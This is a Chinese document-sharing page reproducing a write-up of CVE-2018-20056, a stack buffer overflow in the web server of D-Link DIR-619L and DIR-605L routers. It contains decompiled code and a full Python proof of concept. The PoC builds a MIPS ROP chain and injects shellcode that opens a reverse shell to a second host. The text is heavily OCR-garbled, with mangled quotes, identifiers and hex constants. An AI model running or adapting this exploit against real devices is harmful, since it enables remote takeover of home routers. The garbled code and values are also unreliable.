《(CVE-2018-20056)D-Link DIR-619L&605L 栈溢出漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-20056)D-Link DIR-619L&605L 栈溢出漏洞.docx(4页珍藏版)》请在课桌文档上搜索。
1、(CVE-2018-20056) D-Link DIR-619L&605L 栈溢出漏洞一、漏洞简介D-LINK 的 D1R-619L Rev.B 2.06B1 版本之前和 DIR-605L Rev.B 2.12B1 版本之前的 设备,在binboa文件的formLanguage函数中存在缓冲区溢出漏洞,在调用 sprintf函数时没有对参数的长度进行检查,导致远程攻击者可以通过访问http:/ipZgoformZformLanguageChange 并指定 CurrTime 参数实现远程代码执行。固件下载地址:ftp:/二、漏洞影响D-LINK 的 DIR-619L Rev.B 2.06B1
2、版本之前和 DIR-605L Rev.B 2.12B1 版本之前的 设备。三、复现过程漏洞分析在 formLanguageChange 函数中,通过 WebsGetVar 获取 config.i 18n.language, nextPage, CUrrTime 等参数。WebSGetVar 通过 malloc、memcpy 将获取到的参数 返回给 formLanguageChange。formLanguageChange 接下来调用了 SPrintf 危险函 数向IOCaLf8变量中读入参数内容,并在下一步WebsRedirect使用了 localJ8作为 参数。void formLangua
3、geChange(undefined4 uParml)(int iVarl;char *pcVar2;undefined4 UVar3;FILE *_stream;char *_si;char local_f8 200;char acStack48 24;undefined4 local_18;int local_14;_si = (char *)websGetVar(uParmlconfig.il8n-languagejSDAT_004ac87 4)apmib_set(0x129,&local_18);_si = (char *)websGetVar(uParml ,nextPage,jSD
4、AT_004ac874);if (*_sl = 0) Var3 = WebSGetVar(UParmIJclIrrTime”,&DAT_004ac874);获取 currTime参数 else si = /index.asp;sprintf (Iocal-f8j %sPt=%s,_sl,uVar3);危险函数 sprintf 直接读入字符 LAB_00460b34:WebsRedirect(uParml,local_f8);return;)WebSRedireCt主要调用send_r_moved_perm,这个函数调用了两次危险函数 sprintf,分另IJ 向 acStack224(sp+0
5、xl9f8-0xe0)fll acStack480(sp+0xl9f8-0xle0) 输入字符。undefined4 websRedirect(int iParml,char *pcParm2) (char *pcVarl;*(undefined4 *)(iParml + 0x50) = 0;pcVarl = strstr(pcParm2japply-setting.asp);if (pcVarl != (char *)0x0) apply_setting_redirect = apply_setting_redirect + 1;)send_r_moved_perm(iParml,pcPar
6、m2);return 0;void send_r_moved_perm(int iParmlchar *pcParm2)(undefined4 uVarl;char *pcVar2;undefined auStack6624 6144;char acStack480 256;char acStack224 200;if (pcVar2 = (char *)0x0) if (*pcParm2 = /) pcParm2 = pcParm2 + 1;sprintf(acStack224,http:/%s%s?*(undefined4 *)(iParml + 0x70)jpc Parm2);pcPar
7、m2 = acStack224;sprintf(acStack4804rnttThis document has moved to a new location.rnttPlease update your documents t o reflect the newlocation.rnttrn”jpcParm2);.sreturn;)通过第二两个SPrintf修改返回地址,构造ROP链,导致程序控制流被劫持。(也 可以通过两个sprintf的配合来实现栈的迁移,漏洞作者是这么实现的)漏洞复现pocimport requestsimport sysimport structfrom pwn i
8、mport *#context.log-level=,debug,context.arch=mipscontext. endian=,bigip=192.168.75.150,def syscmdl(a):p=remote(ipj80)z=len(a)print ,+len:+str(z)payload=payload+=POST goformfOrmLanguageChange HTTPl.lrnpayload+=Host: ,+ip+rn,payload+=,Connection: keep-alivern,payload+=Accept-Encoding: gzipj deflatern
9、,payload+=Accept: *rn,payload+=User-Agent: python-requests/2.18.4rnpayload+=Content-Length: +str(z+9)+,rnpayload+=Content-Type: applicationx-www-form-urlencodedrnpayload+=,rn,payload+=,currTime=,payload+=a+,rn,p.send(payload)p.recvuntil()#raw_input()p.close()#base address of Iibc.so.0basel=02ab88000
10、#shellcodeSc=Struct. pack(I,j 0x24060101)sc+=struct.pack(I,0x04d0ffff) sc+=struct .pack(,I, 0x2806ffff) sc+=struct.pack(I,0x27bdffe) sc+=struct .pack(, 1, 0x27e41001) sc+=struct.pack(I,0x2484f023) sc+=struct.pack(I,0afa4ffe8) sc+=struct.pack(1,0afa0ffec) sc+=struct.pack(I,027a5ffe8) sc+=struct.pack(
11、I,0x24020fab) sc+=struct.pack(1,0xafa00108) sc+=struct. pack (, 1 j 0x0101010c ) sc+=,7binsh00 shellcode =,shellcode += asm(shellcraft.connect(192.168.75.149,5555)shellcode += asm(shellcraft.dup2(5j0)shellcode += asm(Shellcraft.dup2(5j1) shellcode += scs0=struct.pack(Ibasel+0x2C794)Sl=Struct.pack(Ij
12、basel+0x2C794)# rop2:move $t9,$s2;jr $t9s2=struct.pack(Ijbasel+0x24b70)# rop3:sleep(l)s3=struct.pack(Ijbasel+0x2bdac)# rop5:addiu $a0,$sp,0xl8;.;IW $r a,030;jr $ras4=struct .pack(I,basel+0x2bdac)#roppayloadl=a,*0xl67+s0+sl+s2+s3payloadl+=struct.pack(,I,basel+025714) #ropl: Ii $a0,l;move $t9, $sl;jal
13、r $t9;ori $al,js0,2payloadl+b*0lc+s0+sl+s2+s3+s4payloadl+=struct.pack(1,basel+05f98) #rop4:Iw $ra,0xlc($sp);.; jr $ra payloadl+=c,*0xlc payloadl+=s3payloadl+=,d,*0x18payloadl+=struct.pack(,1,0x24910101) #rop7 addiu $sl,$a0,257;addi-257;move $t9,Ssljjalr $t9payloadl+=struct.pack(I,02231feff)payloadl+
14、=struct.pack(I,00220c821)payloadl+=struct.pack(1,0x0320f809)payloadl+=struct.pack(I,02231feff)payloadl+=struct.pack(I,0x2231feff)payloadl+=struct. pack(,1, basel+02bda) #rop6:mov $t9,$a0;.; jalr $t9payloadl+=e*020+shellcodeif _name_ = _main_,: syscmdl(payloadl)利用效果:2018-2MS6S python DIR-6191.py Opening connection to 192.168.7S.150 on port 86: Done len:7441 ClOSed COnneCtton to ,92.168.7S.15。 DOrt 8。